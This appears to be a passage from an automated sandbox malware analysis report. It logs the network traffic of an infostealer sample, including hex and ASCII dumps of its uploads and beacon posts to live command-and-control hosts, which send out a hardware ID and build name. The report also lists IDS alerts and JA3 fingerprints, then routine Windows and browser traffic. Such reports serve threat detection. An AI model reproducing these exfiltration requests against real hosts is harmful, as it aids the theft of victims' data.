Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 27816Content-Type: multipart/form-data; boundary=------------------------5l7G3aZgFTH0NKkrout6lXData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 35 6c 37 47 33 61 5a 67 46 54 48 30 4e 4b 6b 72 6f 75 74 36 6c 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 48 69 77 6f 7a 69 68 61 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 47 84 7a 93 ce 42 d1 33 23 61 8f f7 6b b5 9d 25 00 59 ef 2d ee 8c a7 2e c4 ce a3 67 fa 59 6a 64 aa 8b 04 11 77 48 a8 06 44 ba 2c 7d 63 0c 3b e3 fc 02 ab 3c af 0f 87 b1 cc b6 00 b6 d2 48 8b 28 77 9b 49 78 b7 11 4c ab ab 7f c9 fa ba e6 9d 1c c2 1f cd 29 af 1f f9 7d 2e 30 89 8f e4 af e7 fa 86 46 14 39 a7 30 8b 24 c6 fe 01 a0 b8 68 51 12 89 d9 b6 e5 9f 27 c0 78 1f a7 f0 c3 93 d7 63 35 4a 87 1f ea 47 49 84 0a cd 07 32 41 6f 7d a7 8c ea f1 df b7 d2 77 7e fb fc e2 8b 5a c9 0b f0 5b 3b d7 d0 7f 6f b3 a0 a9 0d cc 42 99 01 07 40 31 b1 0c 90 e2 47 5d dc 9b 04 47 bc 9f 0d 2e d1 bc 6f 66 67 43 14 1f cf 0c c1 ef bd 7f 08 43 ee c5 39 f2 e5 0d ef fa f3 20 93 87 0c 58 b5 b6 45 ec c1 5c ce a3 c2 5b 49 42 d0 f5 e0 dd d3 6d 09 6b dc 92 e1 d1 6e 56 c9 a9 93 fd 9a cb 05 b4 1b 5a 6a ef a3 98 a9 3c 18 09 01 f8 cd 25 7b fa 14 e7 cd c2 e9 1a 11 63 c5 61 9a d2 47 64 cc 1c 93 de 13 a5 01 5f e1 d0 6d 43 5a 8c 78 56 83 fa ea ff 48 1b 05 73 45 55 ab 72 4e e8 d6 08 31 0b c7 9c 69 fd c3 69 cf 26 4b ad 2a f4 bb de 9c c8 75 93 26 dc 3f 86 f7 eb 8b b1 9d 99 95 dc c4 3d e6 d3 0f 4e 17 f4 77 08 6a d9 0f 4d 60 de 84 3e 6c 19 e1 a6 bc 0b 5d 25 00 59 18 33 2a a2 38 71 e5 50 7d 06 6f e3 8d 1d e7 ca 42 95 b9 47 29 8a e0 26 23 8d 5f e7 9c 93 ac ee b4 cd 0e 54 d8 93 98 92 eb cc 3d 49 fa 0c 78 96 22 80 4e fa fe a4 e4 95 66 b1 ae ae bf 90 83 54 d4 08 d3 00 14 90 cd a1 63 ce c0 12 fc 7d 1d ae 53 9b 02 81 3a 26 af e7 0c 6e 63 0c 5c 9d 68 87 a4 a1 bf db 62 b8 0e d6 86 80 3e 41 02 4a 8b d7 cf c0 2b 57 68 f3 13 0a fe 45 38 ed c6 b6 45 bd 48 c5 e8 e3 ed f0 8e 49 42 db aa e1 ae 39 92 7d f0 e6 04 43 dc a7 0d eb 9f c7 80 a5 0d 69 a9 b2 00 ef e0 1e 00 18 ad 82 5b d3 ca 17 e1 0e 1e 58 4b 8d e3 82 3a 6c 71 ba 57 5e 7d f0 d1 37 b5 b8 06 2b 65 82 60 79 f2 7d 02 fd 99 df 11 2c 8e 6a 2f 11 b0 c1 03 60 da df 66 83 76 9d 6a 39 28 6a ba cc 35 04 7f 83 77 af e9 e8 8b d5 87 fa cc 17 a8 27 c3 45 3c ea 78 e3 7e 52 21 e4 b5 9f 43 01 01 23 1a f8 85 80 c9 79 40 f1 f4 13 4c 28 02 af 2b 72 20 8a 9e ea 1d 9a 52 3c 20 5b 14 4d bb 18 d8 f7 d1 47 55 ce 89 e0 f3 e0 71 24 09 0c 34 3d f1 f9 bc 4a 8d bf 54 61 3d 34 66 10 e9 77 38 4a 67 12 7a 28 b9 09 40 d1 0e 47 5b 4e 97 77 bb cc 47 e6 d8 d8 2f 9d 27 40 f8 d0 dd 21 dd cd c4 64 85 99 ac 05 79 76 e7 61 1f ab c9 4a 33 04 62 e2 ae 62 f0 0b 90 d2 ff 2c 3b b0 df 9a bf 43 fb f3 66 bc e2 ba c6 79 9d 29 39 9d 53 d9 7e 53 4e
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 36 32 37 37 35 42 35 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB62775B55C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 36 32 37 37 35 42 35 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB62775B55C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 36 32 37 37 35 42 35 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB62775B55C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJJKEHCAKFBFHJKEHCFHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 4a 4b 45 48 43 41 4b 46 42 46 48 4a 4b 45 48 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 36 38 37 42 34 42 30 35 45 33 46 33 32 33 35 31 31 34 31 39 39 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4a 4b 45 48 43 41 4b 46 42 46 48 4a 4b 45 48 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4a 4b 45 48 43 41 4b 46 42 46 48 4a 4b 45 48 43 46 2d 2d 0d 0a Data Ascii: ------JJJJKEHCAKFBFHJKEHCFContent-Disposition: form-data; name="hwid"7687B4B05E3F3235114199------JJJJKEHCAKFBFHJKEHCFContent-Disposition: form-data; name="build"mars------JJJJKEHCAKFBFHJKEHCF--
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View IP Address: 185.215.113.16 185.215.113.16
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View JA3 fingerprint: fb0aa01abe9d8e4037eb3473ca6e2dca
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49730 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49750 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49759 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49794 -> 31.41.244.11:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49823 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49845 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49846 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49852 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49858 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49871 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49872 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49878 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49884 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49885 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49893 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49892 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49902 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49912 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49921 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49928 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49939 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49941 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49956 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49998 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:50008 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49983 -> 172.67.162.84:443
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C56CC60 PR_Recv, 0_2_6C56CC60
Source: global traffic HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=zeVK4sAsYaA8nSs&MD=rnFVSrPb HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic HTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=zeVK4sAsYaA8nSs&MD=rnFVSrPb HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
